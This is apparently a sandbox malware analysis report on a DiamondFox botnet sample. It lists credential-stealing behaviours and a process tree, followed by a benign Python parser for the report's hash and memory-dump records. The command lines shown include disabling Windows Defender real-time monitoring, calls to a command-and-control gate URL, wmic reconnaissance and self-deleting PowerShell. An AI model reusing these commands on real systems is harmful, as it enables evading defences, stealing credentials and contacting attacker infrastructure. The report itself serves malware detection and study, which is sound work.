Analysis

max time kernel: 148s
max time network: 150s
platform: windows10_x64
resource: win10v20210408
submitted: 03-07-2021 23:55

Static task: static1
Behavioral task: behavioral1
Sample: mixazed_20210703-205320.exe
Resource: win7v20210410

General

Target: mixazed_20210703-205320.exe
Size: 1.8MB
MD5: 8703d31eadccffa270ba764a35dfd548
SHA1: 6dd74fef8122095da64955abd99f38421629445d
SHA256: 3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
SHA512: f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2
Malware Config
Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.

ACProtect 1.3x - 1.4x DLL software (2 IoCs)
Detects file using ACProtect software.
Processes (resource, yara rule):
- C:\Users\Admin\AppData\Local\Temp\Unknown.dll (yara rule: acprotect)
- \Users\Admin\AppData\Local\Temp\Unknown.dll (yara rule: acprotect)

DiamondFox payload (12 IoCs)
Detects DiamondFox payload in file/memory.
Processes (resource, yara rule):
- C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe (yara rule: diamondfox) ×2
- C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (yara rule: diamondfox) ×10

NirSoft MailPassView (2 IoCs)
Password recovery tool for various email clients
Processes (resource, yara rule):
- behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp (yara rule: MailPassView)
- behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp (yara rule: MailPassView)

NirSoft WebBrowserPassView (2 IoCs)
Password recovery tool for various web browsers
Processes (resource, yara rule):
- behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp (yara rule: WebBrowserPassView)
- behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp (yara rule: WebBrowserPassView)

Nirsoft (6 IoCs)
Processes (resource, yara rule):
- behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp (yara rule: Nirsoft)
- behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/2516-226-0x0000000000413E10-mapping.dmp (yara rule: Nirsoft)
- behavioral2/memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp (yara rule: Nirsoft)
- behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp (yara rule: Nirsoft)

Downloads MZ/PE file

Executes dropped EXE (13 IoCs)
Processes (pid, process):
- 3980 d1m5VMTVxQYJevtn.exe
- 2216 Dv8Gy0Af.exe
- 3128 Dv8Gy0Af.exe
- 904 MicrosoftEdgeCPS.exe
- 640 MicrosoftEdgeCPS.exe
- 580 MicrosoftEdgeCPS.exe
- 2516 MicrosoftEdgeCPS.exe
- 4024 MicrosoftEdgeCPS.exe
- 2308 MicrosoftEdgeCPS.exe
- 3856 MicrosoftEdgeCPS.exe
- 1272 MicrosoftEdgeCPS.exe
- 2360 MicrosoftEdgeCPS.exe
- 416 UFvoOnkW5oFfKmyk.exe

Processes (resource, yara rule):
- behavioral2/memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmp (yara rule: upx)
- behavioral2/memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmp (yara rule: upx)
- behavioral2/memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmp (yara rule: upx)
- behavioral2/memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmp (yara rule: upx)

Loads dropped DLL (1 IoCs)
Processes (pid, process):
- 3128 Dv8Gy0Af.exe

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of NtSetInformationThreadHideFromDebugger (5 IoCs)
Processes (pid, process):
- 3140 mixazed_20210703-205320.exe (×5)

Suspicious use of SetThreadContext (11 IoCs)
Processes (pid, process, target pid, target process):
- PID 740 mixazed_20210703-205320.exe set thread context of PID 3140 mixazed_20210703-205320.exe
- PID 3140 mixazed_20210703-205320.exe set thread context of PID 2216 Dv8Gy0Af.exe
- PID 2216 Dv8Gy0Af.exe set thread context of PID 3128 Dv8Gy0Af.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 640 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 580 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 2516 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 4024 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 2308 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 3856 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 1272 MicrosoftEdgeCPS.exe
- PID 904 MicrosoftEdgeCPS.exe set thread context of PID 2360 MicrosoftEdgeCPS.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Kills process with taskkill (4 IoCs)
Processes (pid, process):
- 2820 taskkill.exe
- 1164 taskkill.exe
- 1216 taskkill.exe
- 1512 taskkill.exe

Opens file in notepad (likely ransom note) (1 IoCs)
Processes (pid, process):
- 3772 notepad.exe

Suspicious behavior: EnumeratesProcesses (32 IoCs)
Processes (pid, process; repeated hits grouped by pid):
- 740 mixazed_20210703-205320.exe (×14)
- 3128 Dv8Gy0Af.exe (×2)
- 492 powershell.exe (×3)
- 3036 powershell.exe (×3)
- 904 MicrosoftEdgeCPS.exe (×4)
- 640 MicrosoftEdgeCPS.exe (×4)
- 2516 MicrosoftEdgeCPS.exe (×2)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (token, pid, process):
- SeDebugPrivilege, 740 mixazed_20210703-205320.exe
- SeShutdownPrivilege, 3140 mixazed_20210703-205320.exe
- SeDebugPrivilege, 3128 Dv8Gy0Af.exe
- SeDebugPrivilege, 3036 powershell.exe
- SeDebugPrivilege, 492 powershell.exe
- 580 wmic.exe, the following sequence twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 2232 wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35

Suspicious use of SetWindowsHookEx (5 IoCs)
Processes (pid, process):
- 3140 mixazed_20210703-205320.exe (×2)
- 580 MicrosoftEdgeCPS.exe
- 3856 MicrosoftEdgeCPS.exe
- 1272 MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (pid, process, target pid, target process; repeated writes counted):
- PID 740 mixazed_20210703-205320.exe wrote to memory of PID 2844 mixazed_20210703-205320.exe (×3)
- PID 740 mixazed_20210703-205320.exe wrote to memory of PID 3468 mixazed_20210703-205320.exe (×3)
- PID 740 mixazed_20210703-205320.exe wrote to memory of PID 2252 mixazed_20210703-205320.exe (×3)
- PID 740 mixazed_20210703-205320.exe wrote to memory of PID 3140 mixazed_20210703-205320.exe (×7)
- PID 3140 mixazed_20210703-205320.exe wrote to memory of PID 3980 d1m5VMTVxQYJevtn.exe (×3)
- PID 3140 mixazed_20210703-205320.exe wrote to memory of PID 2268 mixazed_20210703-205320.exe (×3)
- PID 3140 mixazed_20210703-205320.exe wrote to memory of PID 2216 Dv8Gy0Af.exe (×8)
- PID 2216 Dv8Gy0Af.exe wrote to memory of PID 3128 Dv8Gy0Af.exe (×8)
- PID 3980 d1m5VMTVxQYJevtn.exe wrote to memory of PID 904 MicrosoftEdgeCPS.exe (×3)
- PID 3980 d1m5VMTVxQYJevtn.exe wrote to memory of PID 3036 powershell.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 492 powershell.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 580 wmic.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 2232 wmic.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 2532 wmic.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 640 wmic.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 2864 wmic.exe (×3)
- PID 904 MicrosoftEdgeCPS.exe wrote to memory of PID 688 wmic.exe (×2)

Processes (tree depth in brackets, then image path, command line and triggered signatures)

[1] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
      command line: C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
  [2] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
      command line: C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
  [2] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
      command line: C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
  [2] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
      command line: C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
          command line: "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            command line: "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" os get caption /FORMAT:List
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_VideoController get caption /FORMAT:List
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
            - Executes dropped EXE
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
          [6] C:\Windows\notepad.exe
              command line: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
              - Opens file in notepad (likely ransom note)
          [6] C:\Windows\write.exe
              command line: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
        [5] C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
            - Executes dropped EXE
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
        [5] C:\Windows\SysWOW64\Wbem\wmic.exe
            command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
        [5] C:\Windows\SysWOW64\taskkill.exe
            command line: "taskkill" /PID 2308 /F
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\taskkill.exe
            command line: "taskkill" /PID 1272 /F
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\taskkill.exe
            command line: "taskkill" /PID 2360 /F
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\taskkill.exe
            command line: "taskkill" /PID 3856 /F
            - Kills process with taskkill
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe' -Force -Recurse
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
        command line: -a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"
    [3] C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
        command line: -a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
          command line: -a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
memory/416-256-0x0000000004D30000-0x000000000522E000-memory.dmp
Filesize
5.0MB
-
memory/416-255-0x0000000004D30000-0x000000000522E000-memory.dmp
Filesize
5.0MB
-
memory/416-252-0x0000000000000000-mapping.dmp
-
memory/492-198-0x00000000093B0000-0x00000000093E3000-memory.dmp
Filesize
204KB
-
memory/492-213-0x00000000098E0000-0x00000000098E1000-memory.dmp
Filesize
4KB
-
memory/492-209-0x000000007EE10000-0x000000007EE11000-memory.dmp
Filesize
4KB
-
memory/492-158-0x0000000004B70000-0x0000000004B71000-memory.dmp
Filesize
4KB
-
memory/492-160-0x0000000004B72000-0x0000000004B73000-memory.dmp
Filesize
4KB
-
memory/492-211-0x00000000094F0000-0x00000000094F1000-memory.dmp
Filesize
4KB
-
memory/492-174-0x0000000007D20000-0x0000000007D21000-memory.dmp
Filesize
4KB
-
memory/492-215-0x0000000004B73000-0x0000000004B74000-memory.dmp
Filesize
4KB
-
memory/492-149-0x0000000000000000-mapping.dmp
-
memory/492-165-0x0000000007570000-0x0000000007571000-memory.dmp
Filesize
4KB
-
memory/492-167-0x0000000007E60000-0x0000000007E61000-memory.dmp
Filesize
4KB
-
memory/492-169-0x0000000007C80000-0x0000000007C81000-memory.dmp
Filesize
4KB
-
memory/492-171-0x0000000007F10000-0x0000000007F11000-memory.dmp
Filesize
4KB
-
memory/492-205-0x00000000086E0000-0x00000000086E1000-memory.dmp
Filesize
4KB
-
memory/580-162-0x0000000000000000-mapping.dmp
-
memory/580-220-0x0000000000401074-mapping.dmp
-
memory/580-222-0x0000000000400000-0x0000000000405000-memory.dmp
Filesize
20KB
-
memory/640-216-0x00000000004466F4-mapping.dmp
-
memory/640-182-0x0000000000000000-mapping.dmp
-
memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp
Filesize
496KB
-
memory/688-195-0x0000000000000000-mapping.dmp
-
memory/740-126-0x00000000011C0000-0x0000000001225000-memory.dmp
Filesize
404KB
-
memory/740-114-0x00000000008E0000-0x00000000008E1000-memory.dmp
Filesize
4KB
-
memory/740-116-0x00000000058D0000-0x00000000058D1000-memory.dmp
Filesize
4KB
-
memory/740-117-0x0000000005320000-0x0000000005321000-memory.dmp
Filesize
4KB
-
memory/740-118-0x0000000002E30000-0x0000000002EC2000-memory.dmp
Filesize
584KB
-
memory/740-119-0x0000000002EA0000-0x0000000002EA1000-memory.dmp
Filesize
4KB
-
memory/740-120-0x0000000002E30000-0x0000000002EC2000-memory.dmp
Filesize
584KB
-
memory/740-121-0x0000000008930000-0x0000000008AD4000-memory.dmp
Filesize
1.6MB
-
memory/904-145-0x0000000000000000-mapping.dmp
-
memory/1164-250-0x0000000000000000-mapping.dmp
-
memory/1216-251-0x0000000000000000-mapping.dmp
-
memory/1272-238-0x0000000000401108-mapping.dmp
-
memory/1272-241-0x0000000000400000-0x0000000000406000-memory.dmp
Filesize
24KB
-
memory/1284-246-0x0000000000000000-mapping.dmp
-
memory/1512-249-0x0000000000000000-mapping.dmp
-
memory/2216-134-0x00000000008D9FE0-mapping.dmp
-
memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmp
Filesize
4.9MB
-
memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmp
Filesize
4.9MB
-
memory/2232-173-0x0000000000000000-mapping.dmp
-
memory/2308-234-0x0000000000400000-0x0000000000413000-memory.dmp
Filesize
76KB
-
memory/2308-232-0x0000000000401000-mapping.dmp
-
memory/2360-247-0x0000000000400000-0x0000000000431000-memory.dmp
Filesize
196KB
-
memory/2360-242-0x0000000000401000-mapping.dmp
-
memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmp
Filesize
136KB
-
memory/2516-226-0x0000000000413E10-mapping.dmp
-
memory/2532-212-0x0000000000000000-mapping.dmp
-
memory/2532-181-0x0000000000000000-mapping.dmp
-
memory/2820-248-0x0000000000000000-mapping.dmp
-
memory/2864-187-0x0000000000000000-mapping.dmp
-
memory/2948-245-0x0000000000000000-mapping.dmp
-
memory/3036-176-0x0000000007DC0000-0x0000000007DC1000-memory.dmp
Filesize
4KB
-
memory/3036-156-0x0000000006E60000-0x0000000006E61000-memory.dmp
Filesize
4KB
-
memory/3036-197-0x0000000008AF0000-0x0000000008AF1000-memory.dmp
Filesize
4KB
-
memory/3036-192-0x0000000009540000-0x0000000009541000-memory.dmp
Filesize
4KB
-
memory/3036-179-0x0000000007E90000-0x0000000007E91000-memory.dmp
Filesize
4KB
-
memory/3036-148-0x0000000000000000-mapping.dmp
-
memory/3036-155-0x00000000042D0000-0x00000000042D1000-memory.dmp
Filesize
4KB
-
memory/3036-161-0x0000000006822000-0x0000000006823000-memory.dmp
Filesize
4KB
-
memory/3036-159-0x0000000006820000-0x0000000006821000-memory.dmp
Filesize
4KB
-
memory/3036-223-0x0000000006823000-0x0000000006824000-memory.dmp
Filesize
4KB
-
memory/3128-139-0x00000000006FC1D0-mapping.dmp
-
memory/3128-144-0x0000000000400000-0x00000000006FE000-memory.dmp
Filesize
3.0MB
-
memory/3128-138-0x0000000000400000-0x00000000006FE000-memory.dmp
Filesize
3.0MB
-
memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmp
Filesize
3.9MB
-
memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmp
Filesize
3.9MB
-
memory/3140-128-0x00000000007E2730-mapping.dmp
-
memory/3856-240-0x0000000000400000-0x0000000000405000-memory.dmp
Filesize
20KB
-
memory/3856-235-0x00000000004010B8-mapping.dmp
-
memory/3980-130-0x0000000000000000-mapping.dmp
-
memory/4024-229-0x000000000044412E-mapping.dmp
-
memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp
Filesize
340KB
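The dropped-file hashes and per-PID memory dumps above are a flattened table, and the extraction has fused each label onto its neighbouring value (`...exeMD5`, `SHA1281246...`, `...memory.dmpFilesize`). The Python below is an added example, not part of the sandbox report or its tooling. It parses records in either the fused layout or the one-item-per-line layout, validates hash lengths, checks each range dump's listed Filesize against its address span, and pairs every non-zero mapping address with the dumped range of the same PID that contains it. The sample input is constructed from records on this page; reading a mapping dump's address as a point inside the image the sandbox saw mapped, and allowing half of the last displayed digit as rounding slack, are my assumptions rather than the sandbox's documented semantics.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample, copied from the report above in the fused "label glued to
# value" form the extraction produced; the parser also accepts one item per line.
SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
memory/416-256-0x0000000004D30000-0x000000000522E000-memory.dmpFilesize
5.0MB
-
memory/3980-130-0x0000000000000000-mapping.dmp
-
memory/4024-229-0x000000000044412E-mapping.dmp
-
memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp
Filesize
340KB
-
"""

LABEL = r"(MD5|SHA1|SHA256|SHA512|Filesize)"
LEAD_RE, TRAIL_RE = re.compile(rf"^{LABEL}(.*)$"), re.compile(rf"^(.+?){LABEL}$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
DUMP_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)(?:-0x([0-9A-Fa-f]+))?-(memory|mapping)\.dmp$")
SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)(B|KB|MB|GB)$")
UNIT = {"B": 1, "KB": 1 << 10, "MB": 1 << 20, "GB": 1 << 30}

class DroppedFile(NamedTuple):
    path: str
    hashes: dict

class MemoryDump(NamedTuple):
    pid: int
    start: int
    end: Optional[int]               # None for a mapping dump (one address only)
    kind: str                        # "memory" or "mapping"
    listed_size: Optional[int] = None
    slack: float = 0.0               # half the last displayed digit of Filesize (assumption)

def tokenize(lines):
    """Split labels the extraction fused onto a neighbouring value."""
    toks = []
    for line in lines:
        if m := LEAD_RE.match(line):
            toks += [m[1]] + ([m[2]] if m[2] else [])
        elif m := TRAIL_RE.match(line):
            toks += [m[1], m[2]]
        else:
            toks.append(line)
    return toks

def parse_size(text):
    """'1.6MB' -> (1677721, 52428.8): bytes plus half the last displayed digit."""
    m = SIZE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised size {text!r}")
    unit, decimals = UNIT[m[2]], len(m[1].partition(".")[2])
    return int(float(m[1]) * unit), unit / (2 * 10 ** decimals)

def parse_record(lines):
    toks = tokenize(lines)
    name, rest = toks[0], toks[1:]
    if len(rest) % 2:
        raise ValueError(f"dangling token in record {name!r}")
    fields = dict(zip(rest[::2], rest[1::2]))
    if m := DUMP_RE.match(name):
        size, slack = parse_size(fields["Filesize"]) if "Filesize" in fields else (None, 0.0)
        return MemoryDump(int(m[1]), int(m[2], 16), int(m[3], 16) if m[3] else None, m[4], size, slack)
    for label, value in fields.items():          # every dropped-file field must be a hash
        if label not in HASH_LEN or not re.fullmatch("[0-9a-f]{%d}" % HASH_LEN[label], value):
            raise ValueError(f"bad {label} for {name}: {value!r}")
    return DroppedFile(name, fields)

def parse_report(text):
    """Records are separated by '-' lines; returns (dropped files, memory dumps)."""
    files, dumps, rec = [], [], []
    for line in map(str.strip, text.splitlines() + ["-"]):
        if line and line != "-":
            rec.append(line)
        elif rec:
            item = parse_record(rec)
            (dumps if isinstance(item, MemoryDump) else files).append(item)
            rec = []
    return files, dumps

def size_mismatches(dumps):
    """Range dumps whose listed Filesize disagrees with end-start beyond rounding."""
    return [d for d in dumps if d.end is not None and d.listed_size is not None
            and abs((d.end - d.start) - d.listed_size) > d.slack]

def mapped_images(dumps):
    """Pair each non-zero mapping address with the dumped range of the same PID that
    contains it; treating that range as the image the sandbox saw mapped is my heuristic."""
    ranges = [d for d in dumps if d.kind == "memory"]
    return sorted((m.pid, m.start, r.start, r.end)
                  for m in dumps if m.kind == "mapping" and m.start
                  for r in ranges if r.pid == m.pid and r.start <= m.start < r.end)
```

Run over the whole list above, `size_mismatches` comes back empty (every listed Filesize matches its address span to within display rounding, including the 1.6MB entry for PID 740, which is 0x1A4000 bytes), and `mapped_images` pairs PID 4024's mapping address 0x44412E with the 0x400000-0x455000 range, the two dumps the MailPassView rule matched in the signature section; the zero-address mapping dumps (PIDs 688, 904, 1164 and so on) are skipped because they carry no address to locate.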